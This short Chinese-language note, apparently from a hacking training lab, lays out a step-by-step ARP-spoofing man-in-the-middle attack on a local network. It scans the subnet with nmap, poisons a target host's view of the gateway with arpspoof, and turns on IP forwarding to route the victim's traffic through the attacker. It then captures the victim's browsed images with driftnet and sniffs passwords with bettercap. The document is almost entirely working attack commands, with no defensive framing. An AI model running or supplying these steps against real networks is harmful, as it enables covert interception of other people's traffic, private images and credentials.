##扫描局域网中存活的主机
nmap -sS 192.168.1.*
##对网关地址进行染毒
arpspoof -t 192.168.1.56 -r 192.168.1.1
此时目标主机192.168.1.56出现假的断网
##开启路由转发 将目标主机的流量流进攻击机
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
回车以后会出现1,此时目标机的网络恢复正常
##对图片进行嗅探
driftnet -i eth0
打开driftnet查看目标机浏览图片
##创建文件夹存储目标机所浏览的图片
driftnet -i eth0 -a -d xuegod -s
##开始密码嗅探
bettercap -X